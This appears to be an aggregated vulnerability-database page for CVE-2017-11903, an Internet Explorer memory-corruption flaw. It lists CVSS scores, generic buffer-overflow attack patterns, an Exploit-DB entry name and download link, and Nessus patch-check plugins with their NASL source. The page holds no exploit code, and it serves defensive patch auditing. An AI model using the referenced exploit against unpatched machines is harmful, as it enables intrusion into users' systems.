Vulnerabilities > CVE-2017-11903 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Microsoft Internet Explorer 10/11/9

047910
CVSS 7.6 - HIGH
Attack vector
NETWORK
Attack complexity
HIGH
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
high complexity
microsoft
CWE-119
nessus
exploit available

Summary

Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Overflow Buffers
    Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
  • Client-side Injection-induced Buffer Overflow
    This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
  • Filter Failure through Buffer Overflow
    In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
  • MIME Conversion
    An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.

Exploit-Db

descriptionMicrosoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free. CVE-2017-11903. Dos exploit for Windows platform. Tags: Use After Free (UAF)
fileexploits/windows/dos/43367.html
idEDB-ID:43367
last seen2017-12-19
modified2017-12-19
platformwindows
port
published2017-12-19
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/43367/
titleMicrosoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free
typedos

Nessus

  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4053581.NASL
    descriptionThe remote Windows host is missing security update 4053581. It is, therefore, affected by multiple vulnerabilities : - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11910, CVE-2017-11918) - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105182
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105182
    titleKB4053581: Windows 10 December 2017 Security Update
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the Microsoft Security Updates API. The text
    # itself is copyright (C) Microsoft Corporation.
    #
    include("compat.inc");
    
    if (description)
    {
      script_id(105182);
      script_version("1.9");
      script_cvs_date("Date: 2019/11/12");
    
      script_cve_id(
        "CVE-2017-11885",
        "CVE-2017-11886",
        "CVE-2017-11887",
        "CVE-2017-11888",
        "CVE-2017-11889",
        "CVE-2017-11890",
        "CVE-2017-11894",
        "CVE-2017-11895",
        "CVE-2017-11899",
        "CVE-2017-11901",
        "CVE-2017-11903",
        "CVE-2017-11906",
        "CVE-2017-11907",
        "CVE-2017-11910",
        "CVE-2017-11912",
        "CVE-2017-11913",
        "CVE-2017-11918",
        "CVE-2017-11919",
        "CVE-2017-11927",
        "CVE-2017-11930"
      );
      script_bugtraq_id(
        102045,
        102046,
        102047,
        102053,
        102054,
        102055,
        102058,
        102062,
        102063,
        102065,
        102077,
        102078,
        102080,
        102082,
        102086,
        102089,
        102091,
        102092,
        102093,
        102095
      );
      script_xref(name:"MSKB", value:"4053581");
      script_xref(name:"MSFT", value:"MS17-4053581");
    
      script_name(english:"KB4053581: Windows 10 December 2017 Security Update");
      script_summary(english:"Checks for rollup.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Windows host is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The remote Windows host is missing security update 4053581.
    It is, therefore, affected by multiple vulnerabilities :
    
      - A security feature bypass exists when Device Guard
        incorrectly validates an untrusted file. An attacker who
        successfully exploited this vulnerability could make an
        unsigned file appear to be signed. Because Device Guard
        relies on the signature to determine the file is non-
        malicious, Device Guard could then allow a malicious
        file to execute. In an attack scenario, an attacker
        could make an untrusted file appear to be a trusted
        file. The update addresses the vulnerability by
        correcting how Device Guard handles untrusted files.
        (CVE-2017-11899)
    
      - An information disclosure vulnerability exists when the
        scripting engine does not properly handle objects in
        memory in Microsoft browsers. An attacker who
        successfully exploited the vulnerability could obtain
        information to further compromise the users system.
        (CVE-2017-11919)
    
      - A remote code execution vulnerability exists in the way
        that the scripting engine handles objects in memory in
        Microsoft Edge. The vulnerability could corrupt memory
        in such a way that an attacker could execute arbitrary
        code in the context of the current user. An attacker who
        successfully exploited the vulnerability could gain the
        same user rights as the current user.  (CVE-2017-11889,
        CVE-2017-11910, CVE-2017-11918)
    
      - A remote code execution vulnerability exists when
        Microsoft Edge improperly accesses objects in memory.
        The vulnerability could corrupt memory in such a way
        that enables an attacker to execute arbitrary code in
        the context of the current user. An attacker who
        successfully exploited the vulnerability could gain the
        same user rights as the current user.  (CVE-2017-11888)
    
      - A remote code execution vulnerability exists when
        Internet Explorer improperly accesses objects in memory.
        The vulnerability could corrupt memory in such a way
        that an attacker could execute arbitrary code in the
        context of the current user. An attacker who
        successfully exploited the vulnerability could gain the
        same user rights as the current user.  (CVE-2017-11886,
        CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,
        CVE-2017-11907, CVE-2017-11913)
    
      - A remote code execution vulnerability exists in RPC if
        the server has Routing and Remote Access enabled. An
        attacker who successfully exploited this vulnerability
        could execute code on the target system. An attacker
        could then install programs; view, change, or delete
        data; or create new accounts with full user rights.
        (CVE-2017-11885)
    
      - A remote code execution vulnerability exists in the way
        the scripting engine handles objects in memory in
        Microsoft browsers. The vulnerability could corrupt
        memory in such a way that an attacker could execute
        arbitrary code in the context of the current user. An
        attacker who successfully exploited the vulnerability
        could gain the same user rights as the current user.
        (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,
        CVE-2017-11930)
    
      - An information disclosure vulnerability exists when
        Internet Explorer improperly handles objects in memory.
        An attacker who successfully exploited the vulnerability
        could obtain information to further compromise the users
        system.  (CVE-2017-11887, CVE-2017-11906)
    
      - An information disclosure vulnerability exists when the
        Windows its:// protocol handler unnecessarily sends
        traffic to a remote site in order to determine the zone
        of a provided URL. This could potentially result in the
        disclosure of sensitive information to a malicious site.
        (CVE-2017-11927)");
      # https://support.microsoft.com/en-us/help/4053581/windows-10-update-kb4053581
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dfb1aa54");
      script_set_attribute(attribute:"solution", value:
    "Apply security update KB4053581.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-11885");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/12");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/12/12");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/12");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows : Microsoft Bulletins");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("smb_check_rollup.nasl", "smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
      script_require_keys("SMB/MS_Bulletin_Checks/Possible");
      script_require_ports(139, 445, "Host/patch_management_checks");
    
      exit(0);
    }
    
    include("audit.inc");
    include("smb_hotfixes_fcheck.inc");
    include("smb_hotfixes.inc");
    include("smb_func.inc");
    include("misc_func.inc");
    
    get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");
    
    bulletin = "MS17-12";
    kbs = make_list('4053581');
    
    if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);
    
    get_kb_item_or_exit("SMB/Registry/Enumerated");
    get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);
    
    if (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);
    
    share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
    if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);
    
    if (
      smb_check_rollup(os:"10",
                       sp:0,
                       os_build:"10240",
                       rollup_date:"12_2017",
                       bulletin:bulletin,
                       rollup_kb_list:[4053581])
    )
    {
      replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);
      hotfix_security_hole();
      hotfix_check_fversion_end();
      exit(0);
    }
    else
    {
      hotfix_check_fversion_end();
      audit(AUDIT_HOST_NOT, hotfix_get_audit_report());
    }
    
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4054517.NASL
    descriptionThe remote Windows host is missing security update 4054517. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918) - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105183
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105183
    titleKB4054517: Windows 10 Version 1709 and Windows Server Version 1709 December 2017 Security Update
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the Microsoft Security Updates API. The text
    # itself is copyright (C) Microsoft Corporation.
    #
    include("compat.inc");
    
    if (description)
    {
      script_id(105183);
      script_version("1.10");
      script_cvs_date("Date: 2018/12/13 17:21:46");
    
      script_cve_id(
        "CVE-2017-11885",
        "CVE-2017-11886",
        "CVE-2017-11887",
        "CVE-2017-11888",
        "CVE-2017-11889",
        "CVE-2017-11890",
        "CVE-2017-11893",
        "CVE-2017-11894",
        "CVE-2017-11895",
        "CVE-2017-11899",
        "CVE-2017-11901",
        "CVE-2017-11903",
        "CVE-2017-11905",
        "CVE-2017-11906",
        "CVE-2017-11907",
        "CVE-2017-11908",
        "CVE-2017-11909",
        "CVE-2017-11910",
        "CVE-2017-11911",
        "CVE-2017-11912",
        "CVE-2017-11913",
        "CVE-2017-11914",
        "CVE-2017-11918",
        "CVE-2017-11919",
        "CVE-2017-11927",
        "CVE-2017-11930"
      );
      script_bugtraq_id(
        102045,
        102046,
        102047,
        102050,
        102052,
        102053,
        102054,
        102055,
        102058,
        102062,
        102063,
        102065,
        102077,
        102078,
        102080,
        102081,
        102082,
        102085,
        102086,
        102087,
        102088,
        102089,
        102091,
        102092,
        102093,
        102095
      );
      script_xref(name:"MSKB", value:"4054517");
      script_xref(name:"MSFT", value:"MS17-4054517");
    
      script_name(english:"KB4054517: Windows 10 Version 1709 and Windows Server Version 1709 December 2017 Security Update");
      script_summary(english:"Checks for rollup.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Windows host is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The remote Windows host is missing security update 4054517.
    It is, therefore, affected by multiple vulnerabilities :
    
      - A remote code execution vulnerability exists in the way
        that the scripting engine handles objects in memory in
        Microsoft Edge. The vulnerability could corrupt memory
        in such a way that an attacker could execute arbitrary
        code in the context of the current user. An attacker who
        successfully exploited the vulnerability could gain the
        same user rights as the current user.  (CVE-2017-11889,
        CVE-2017-11893, CVE-2017-11905, CVE-2017-11908,
        CVE-2017-11909, CVE-2017-11910, CVE-2017-11911,
        CVE-2017-11914, CVE-2017-11918)
    
      - A security feature bypass exists when Device Guard
        incorrectly validates an untrusted file. An attacker who
        successfully exploited this vulnerability could make an
        unsigned file appear to be signed. Because Device Guard
        relies on the signature to determine the file is non-
        malicious, Device Guard could then allow a malicious
        file to execute. In an attack scenario, an attacker
        could make an untrusted file appear to be a trusted
        file. The update addresses the vulnerability by
        correcting how Device Guard handles untrusted files.
        (CVE-2017-11899)
    
      - An information disclosure vulnerability exists when the
        scripting engine does not properly handle objects in
        memory in Microsoft browsers. An attacker who
        successfully exploited the vulnerability could obtain
        information to further compromise the users system.
        (CVE-2017-11919)
    
      - A remote code execution vulnerability exists when
        Microsoft Edge improperly accesses objects in memory.
        The vulnerability could corrupt memory in such a way
        that enables an attacker to execute arbitrary code in
        the context of the current user. An attacker who
        successfully exploited the vulnerability could gain the
        same user rights as the current user.  (CVE-2017-11888)
    
      - A remote code execution vulnerability exists when
        Internet Explorer improperly accesses objects in memory.
        The vulnerability could corrupt memory in such a way
        that an attacker could execute arbitrary code in the
        context of the current user. An attacker who
        successfully exploited the vulnerability could gain the
        same user rights as the current user.  (CVE-2017-11886,
        CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,
        CVE-2017-11907, CVE-2017-11913)
    
      - A remote code execution vulnerability exists in RPC if
        the server has Routing and Remote Access enabled. An
        attacker who successfully exploited this vulnerability
        could execute code on the target system. An attacker
        could then install programs; view, change, or delete
        data; or create new accounts with full user rights.
        (CVE-2017-11885)
    
      - A remote code execution vulnerability exists in the way
        the scripting engine handles objects in memory in
        Microsoft browsers. The vulnerability could corrupt
        memory in such a way that an attacker could execute
        arbitrary code in the context of the current user. An
        attacker who successfully exploited the vulnerability
        could gain the same user rights as the current user.
        (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,
        CVE-2017-11930)
    
      - An information disclosure vulnerability exists when
        Internet Explorer improperly handles objects in memory.
        An attacker who successfully exploited the vulnerability
        could obtain information to further compromise the users
        system.  (CVE-2017-11887, CVE-2017-11906)
    
      - An information disclosure vulnerability exists when the
        Windows its:// protocol handler unnecessarily sends
        traffic to a remote site in order to determine the zone
        of a provided URL. This could potentially result in the
        disclosure of sensitive information to a malicious site.
        (CVE-2017-11927)");
      # https://support.microsoft.com/en-us/help/4054517/windows-10-update-kb4054517
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a819f12");
      script_set_attribute(attribute:"solution", value:
    "Apply security update KB4054517.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-11885");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/12");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/12/12");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/12");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows : Microsoft Bulletins");
    
      script_copyright(english:"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("smb_check_rollup.nasl", "smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
      script_require_keys("SMB/MS_Bulletin_Checks/Possible");
      script_require_ports(139, 445, "Host/patch_management_checks");
    
      exit(0);
    }
    
    include("audit.inc");
    include("smb_hotfixes_fcheck.inc");
    include("smb_hotfixes.inc");
    include("smb_func.inc");
    include("misc_func.inc");
    
    get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");
    
    bulletin = "MS17-12";
    kbs = make_list('4054517');
    
    if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);
    
    get_kb_item_or_exit("SMB/Registry/Enumerated");
    get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);
    
    if (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);
    
    share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
    if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);
    
    if (
      smb_check_rollup(os:"10",
                       sp:0,
                       os_build:"16299",
                       rollup_date:"12_2017",
                       bulletin:bulletin,
                       rollup_kb_list:[4054517])
    )
    {
      replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);
      hotfix_security_hole();
      hotfix_check_fversion_end();
      exit(0);
    }
    else
    {
      hotfix_check_fversion_end();
      audit(AUDIT_HOST_NOT, hotfix_get_audit_report());
    }
    
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4053580.NASL
    descriptionThe remote Windows host is missing security update 4053580. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918) - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105181
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105181
    titleKB4053580: Windows 10 Version 1703 December 2017 Security Update
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4054518.NASL
    descriptionThe remote Windows host is missing security update 4054521 or cumulative update 4054518. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105184
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105184
    titleWindows 7 and Windows Server 2008 R2 December 2017 Security Updates
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4053578.NASL
    descriptionThe remote Windows host is missing security update 4053578. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918) - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105179
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105179
